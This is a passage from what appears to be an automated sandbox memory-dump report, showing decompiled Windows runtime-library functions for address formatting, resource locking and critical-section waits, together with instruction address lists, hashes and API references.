                                      0x025f231d
                                      0x025f2320
                                      0x025f2323
                                      0x025f2323
                                      0x025f2328
                                      0x025f232d
                                      0x025f232f
                                      0x025f2331
                                      0x025f2336
                                      0x025f2336
                                      0x025f233b
                                      0x025f233d
                                      0x025f2350
                                      0x025f2351
                                      0x025f2356
                                      0x025f2359
                                      0x025f2359
                                      0x025f235b
                                      0x025f235d
                                      0x025b5367
                                      0x025b536b
                                      0x025b5372
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x025f2363
                                      0x025f2363
                                      0x025f2369
                                      0x025f236a
                                      0x025f236c
                                      0x025f2371
                                      0x025f2373
                                      0x00000000
                                      0x025f2379
                                      0x025f2379
                                      0x025f237a
                                      0x025f237f
                                      0x025f237f
                                      0x025f2385
                                      0x025f2386
                                      0x025f2389
                                      0x025f238e
                                      0x025f2390
                                      0x025b5378
                                      0x025b537c
                                      0x025f2396
                                      0x025f2396
                                      0x025f2397
                                      0x025f239c
                                      0x025f23a2
                                      0x025f23a3
                                      0x025f23a6
                                      0x025f23ab
                                      0x025f23ad
                                      0x00000000
                                      0x025f23b3
                                      0x025f23b3
                                      0x025f23b4
                                      0x025f23b9
                                      0x025f23ba
                                      0x025f23ba
                                      0x025f23bc
                                      0x025f23bf
                                      0x00000000
                                      0x00000000
                                      0x025e9153
                                      0x025e9158
                                      0x025e915a
                                      0x025e915e
                                      0x025e9160
                                      0x00000000
                                      0x025e9166
                                      0x025e9166
                                      0x025e9171
                                      0x025e9176
                                      0x025e9176
                                      0x00000000
                                      0x025e9160
                                      0x025f23c6
                                      0x025f23d7
                                      0x025f23d7
                                      0x025f23ad
                                      0x025f2390
                                      0x025f2373
                                      0x025f233f
                                      0x025f233f
                                      0x00000000
                                      0x025f233f
                                      0x025f2291
                                      0x025f2291
                                      0x025f2293
                                      0x025f2295
                                      0x025f229a
                                      0x025f22a1
                                      0x025f22a3
                                      0x025f22a7
                                      0x025f22a9
                                      0x00000000
                                      0x00000000
                                      0x025f22ab
                                      0x025f22ad
                                      0x025f22af
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x025f22af
                                      0x025f22b1
                                      0x025f22b4
                                      0x025f22b4
                                      0x025f22b6
                                      0x025b53be
                                      0x025b53be
                                      0x025b53be
                                      0x025b53c0
                                      0x00000000
                                      0x00000000
                                      0x025b53cb
                                      0x025b53ce
                                      0x025b53d0
                                      0x025b53d4
                                      0x025b53d6
                                      0x00000000
                                      0x025b53d8
                                      0x025b53e3
                                      0x025b53ea
                                      0x025b53ea
                                      0x00000000
                                      0x025b53d6
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x025f22b6
                                      0x00000000
                                      0x025f228f
                                      0x025f2349
                                      0x025f234d
                                      0x025f2251
                                      0x025f2251
                                      0x00000000
                                      0x025f2251
                                      0x025f21a4
                                      0x025f21a4
                                      0x025f21a6
                                      0x025f21a8
                                      0x025f21ac
                                      0x025f21b6
                                      0x025f21b8
                                      0x025f21bc
                                      0x025f21be
                                      0x00000000
                                      0x00000000
                                      0x025f21c0
                                      0x025f21c2
                                      0x025f21c4
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x025f21c4
                                      0x025f21c6
                                      0x025f21c6
                                      0x025f21c8
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x025f21c8
                                      0x025f21a2
                                      0x00000000
                                      0x025f2183
                                      0x025d057b
                                      0x025d057d
                                      0x025d0581
                                      0x025d0583
                                      0x025f2178
                                      0x00000000
                                      0x025d0589
                                      0x025d058f
                                      0x025d058f
                                      0x025d0583
                                      0x00000000

                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 025F2206
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                      • API String ID: 885266447-4236105082
                                      • Opcode ID: 34d857a008bc043c351624942ec6ccef10ec937c3e465678f12fc91d82bb82b6
                                      • Instruction ID: e559f2022885c17d6733b422d06019f28312ce942c3b0d09baf0c36be4b6b020
                                      • Opcode Fuzzy Hash: 34d857a008bc043c351624942ec6ccef10ec937c3e465678f12fc91d82bb82b6
                                      • Instruction Fuzzy Hash: A6514E717002026FEF54CE18CC81F6637AABFC4724F214259ED59DB284EA71EC418B9C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 025D14C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 64%
                                      			E025D14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x2672088; // 0x768ef620
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E025C7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E025D13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E025C7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E025C7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E02592340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0259E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                      0x025d14c0
                                      0x025d14cb
                                      0x025d14d2
                                      0x025d14d6
                                      0x025d14da
                                      0x025d14de
                                      0x025d14e3
                                      0x025d157a
                                      0x025d157a
                                      0x025d14f1
                                      0x025d14f3
                                      0x025fea0f
                                      0x00000000
                                      0x025fea15
                                      0x00000000
                                      0x025fea15
                                      0x025d14f9
                                      0x025d14f9
                                      0x025d14fe
                                      0x025d1504
                                      0x025fea1a
                                      0x025fea1f
                                      0x025fea21
                                      0x025fea22
                                      0x025fea27
                                      0x025fea2a
                                      0x025fea2a
                                      0x025d1515
                                      0x025d1517
                                      0x025d156d
                                      0x025d1572
                                      0x025d1575
                                      0x025d1575
                                      0x025d151e
                                      0x025fea50
                                      0x025fea55
                                      0x025fea58
                                      0x025fea58
                                      0x025d152e
                                      0x025d1531
                                      0x025d1533
                                      0x00000000
                                      0x025d1535
                                      0x025d1541
                                      0x025d1549
                                      0x025d1549
                                      0x025d1533
                                      0x025d14f3
                                      0x025d1559

                                      APIs
                                      • ___swprintf_l.LIBCMT ref: 025FEA22
                                        • Part of subcall function 025D13CB: ___swprintf_l.LIBCMT ref: 025D146B
                                        • Part of subcall function 025D13CB: ___swprintf_l.LIBCMT ref: 025D1490
                                      • ___swprintf_l.LIBCMT ref: 025D156D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: ___swprintf_l
                                      • String ID: %%%u$]:%u
                                      • API String ID: 48624451-3050659472
                                      • Opcode ID: ee6e0eabb585a7e7fd355566485fb69e845862663ec02d387f8fa22f1c312fa7
                                      • Instruction ID: a9bc11d2ca549dc150ee0cb901926fcf7bdb088ca6e9439160f7912521eb5c13
                                      • Opcode Fuzzy Hash: ee6e0eabb585a7e7fd355566485fb69e845862663ec02d387f8fa22f1c312fa7
                                      • Instruction Fuzzy Hash: B421E372900619ABDF30DE68CC41AEE77ACBB54300F448426ED4AD3100EB75AE58CFE8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 025B53A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 44%
                                      			E025B53A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x026701c0;
									_push(_t92);
									_push(0);
									_t37 = E0258F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E025D4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E025E3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E025E3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0261217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E025E3F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E025D3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E025B5384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0258F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E025D3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0258F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E025D3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0258F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E025D3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E025B5329(_t74, _t92);
													_push(1);
													return E025B53A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

























                                      0x025b53ab
                                      0x025b53ae
                                      0x025b53b1
                                      0x025b53b4
                                      0x025b53b7
                                      0x025d05b6
                                      0x025d05c0
                                      0x025d05c3
                                      0x00000000
                                      0x025d05c9
                                      0x025d05c9
                                      0x025d05cc
                                      0x025d05d5
                                      0x025d05d5
                                      0x025b53bd
                                      0x025b53bd
                                      0x025b53bd
                                      0x025b53be
                                      0x025b53be
                                      0x025b53be
                                      0x025b53c0
                                      0x00000000
                                      0x00000000
                                      0x025f2269
                                      0x025f226d
                                      0x025f2349
                                      0x025f234d
                                      0x025f2273
                                      0x025f2276
                                      0x025f2279
                                      0x025f227e
                                      0x025f2283
                                      0x025f2287
                                      0x025f228a
                                      0x025f228d
                                      0x025f228f
                                      0x025f22bc
                                      0x025f22bc
                                      0x025f22bc
                                      0x025f22be
                                      0x025f22c4
                                      0x025f22cc
                                      0x025f22d0
                                      0x025f22d6
                                      0x025f22d7
                                      0x025f22da
                                      0x025f22df
                                      0x025f22e4
                                      0x00000000
                                      0x00000000
                                      0x025f22e6
                                      0x025f22e9
                                      0x025f22f4
                                      0x025f22f9
                                      0x025f22fa
                                      0x025f2305
                                      0x025f2314
                                      0x025f2319
                                      0x025f231a
                                      0x025f231d
                                      0x025f2320
                                      0x025f2323
                                      0x025f2323
                                      0x025f2328
                                      0x025f232d
                                      0x025f232f
                                      0x025f2331
                                      0x025f2336
                                      0x025f2336
                                      0x025f233b
                                      0x025f233d
                                      0x025f2350
                                      0x025f2351
                                      0x025f2356
                                      0x025f2359
                                      0x025f2359
                                      0x025f235b
                                      0x025f235d
                                      0x025b5367
                                      0x025b536b
                                      0x025b5372
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x025f2363
                                      0x025f2363
                                      0x025f2369
                                      0x025f236a
                                      0x025f236c
                                      0x025f2371
                                      0x025f2373
                                      0x00000000
                                      0x025f2379
                                      0x025f2379
                                      0x025f237a
                                      0x025f237f
                                      0x025f237f
                                      0x025f2385
                                      0x025f2386
                                      0x025f2389
                                      0x025f238e
                                      0x025f2390
                                      0x025b5378
                                      0x025b537c
                                      0x025f2396
                                      0x025f2396
                                      0x025f2397
                                      0x025f239c
                                      0x025f23a2
                                      0x025f23a3
                                      0x025f23a6
                                      0x025f23ab
                                      0x025f23ad
                                      0x00000000
                                      0x025f23b3
                                      0x025f23b3
                                      0x025f23b4
                                      0x025f23b9
                                      0x025f23ba
                                      0x025f23ba
                                      0x025f23bc
                                      0x025f23bf
                                      0x00000000
                                      0x00000000
                                      0x025e9153
                                      0x025e9158
                                      0x025e915a
                                      0x025e915e
                                      0x025e9160
                                      0x00000000
                                      0x025e9166
                                      0x025e9166
                                      0x025e9171
                                      0x025e9176
                                      0x025e9176
                                      0x00000000
                                      0x025e9160
                                      0x025f23c6
                                      0x025f23cb
                                      0x025f23d7
                                      0x025f23d7
                                      0x025f23ad
                                      0x025f2390
                                      0x025f2373
                                      0x025f233f
                                      0x025f233f
                                      0x00000000
                                      0x025f233f
                                      0x025f2291
                                      0x025f2291
                                      0x025f2293
                                      0x025f2295
                                      0x025f229a
                                      0x025f22a1
                                      0x025f22a3
                                      0x025f22a7
                                      0x025f22a9
                                      0x00000000
                                      0x00000000
                                      0x025f22ab
                                      0x025f22ad
                                      0x025f22af
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x025f22af
                                      0x025f22b1
                                      0x025f22b4
                                      0x025f22b4
                                      0x025f22b6
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x025f22b6
                                      0x025f228f
                                      0x00000000
                                      0x025f226d
                                      0x025b53cb
                                      0x025b53ce
                                      0x025b53d0
                                      0x025b53d4
                                      0x025b53d6
                                      0x00000000
                                      0x025b53d8
                                      0x025b53e3
                                      0x025b53ea
                                      0x025b53ea
                                      0x025b53d6
                                      0x00000000

                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 025F22F4
                                      Strings
                                      • RTL: Re-Waiting, xrefs: 025F2328
                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 025F22FC
                                      • RTL: Resource at %p, xrefs: 025F230B
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                      • API String ID: 885266447-871070163
                                      • Opcode ID: e4d12a29f9477b8b42ee75b64bc0176bc2bcb4bcf4a36dd4252c3f151132c5c7
                                      • Instruction ID: 007e2638ed58a02b8f00de3d383e54a996029c942ba36c206b65ec32ec6c149f
                                      • Opcode Fuzzy Hash: e4d12a29f9477b8b42ee75b64bc0176bc2bcb4bcf4a36dd4252c3f151132c5c7
                                      • Instruction Fuzzy Hash: E751F8B16116066BEF15DF68CC80FA67799FF88324F104659FD19DB280F761E8418BA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 025BEC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 51%
                                      			E025BEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E025ADA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x267793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E025916C0(_t39);
				} else {
					_t40 = E0258F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E025D3915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E025901A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x267793c; // 0x0
								_push(_t85);
								_t44 = E02591F28(_t71);
							} else {
								_t44 = E0258F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E025D3915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E02612306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E025BEC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E025D4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E025E3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E025E3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x26720c0;
								if(_t85 != 0x26720c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0261217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E025E3F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                      0x025bec56
                                      0x025bec56
                                      0x025bec56
                                      0x025bec5c
                                      0x025bec64
                                      0x025f23e6
                                      0x025f23eb
                                      0x025f23eb
                                      0x025bec6a
                                      0x025bec6c
                                      0x025bec6f
                                      0x025f23f3
                                      0x025f23f8
                                      0x025f23fa
                                      0x025f23fc
                                      0x025bec75
                                      0x025bec76
                                      0x025bec76
                                      0x025bec7b
                                      0x025bec7c
                                      0x025bec7e
                                      0x025f2406
                                      0x025f2407
                                      0x025f240c
                                      0x025f240d
                                      0x025f240d
                                      0x025f240d
                                      0x025f2414
                                      0x025f2417
                                      0x025f241e
                                      0x025f2435
                                      0x025f2438
                                      0x025f243c
                                      0x025f243f
                                      0x025f2442
                                      0x025f2443
                                      0x025f2446
                                      0x025f2449
                                      0x025f2453
                                      0x025f2455
                                      0x025f245b
                                      0x025f245b
                                      0x025beb99
                                      0x025beb99
                                      0x025beb9c
                                      0x025beb9d
                                      0x025beb9f
                                      0x025beba2
                                      0x025f2465
                                      0x025f246b
                                      0x025f246d
                                      0x025beba8
                                      0x025beba9
                                      0x025beba9
                                      0x025bebae
                                      0x025bebb3
                                      0x025bebb9
                                      0x025bebbb
                                      0x025f2513
                                      0x025f2514
                                      0x025f2519
                                      0x025f251b
                                      0x025bec2a
                                      0x025bec2d
                                      0x025bec33
                                      0x025bec36
                                      0x025bec3a
                                      0x025bec3e
                                      0x025bec40
                                      0x025bec47
                                      0x025bec47
                                      0x025bec40
                                      0x025922c6
                                      0x025bebc1
                                      0x025bebc1
                                      0x025bebc5
                                      0x025bec9a
                                      0x025bec9a
                                      0x025bebd6
                                      0x025bebd6
                                      0x00000000
                                      0x025bebbb
                                      0x025f2477
                                      0x025f247c
                                      0x025f2486
                                      0x025f248b
                                      0x025f2496
                                      0x025f249b
                                      0x025f249d
                                      0x025f24a0
                                      0x025f24a3
                                      0x025f24aa
                                      0x025f24aa
                                      0x025f24a5
                                      0x025f24a5
                                      0x025f24a5
                                      0x025f24ac
                                      0x025f24af
                                      0x025f24b0
                                      0x025f24b3
                                      0x025f24b9
                                      0x025f24ba
                                      0x025f24bb
                                      0x025f24c6
                                      0x025f24cb
                                      0x025f24cd
                                      0x025f24d0
                                      0x025f24d1
                                      0x025f24d4
                                      0x025f24d6
                                      0x025f24d9
                                      0x025f24d9
                                      0x025f24dc
                                      0x025f24df
                                      0x025f24e1
                                      0x025f24e7
                                      0x025f24e9
                                      0x025f24ec
                                      0x025f24ef
                                      0x025f24f2
                                      0x025f24f2
                                      0x025f24ef
                                      0x025f24e7
                                      0x025f24fa
                                      0x025f24ff
                                      0x025f2501
                                      0x025f2503
                                      0x025f2506
                                      0x025f250b
                                      0x025beb8c
                                      0x025beb93
                                      0x00000000
                                      0x00000000
                                      0x025beb93
                                      0x00000000
                                      0x025beb99
                                      0x025bec85
                                      0x025bec85
                                      0x025bec85
                                      0x00000000

                                      Strings
                                      • RTL: Re-Waiting, xrefs: 025F24FA
                                      • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 025F24BD
                                      • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 025F248D
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp Download File
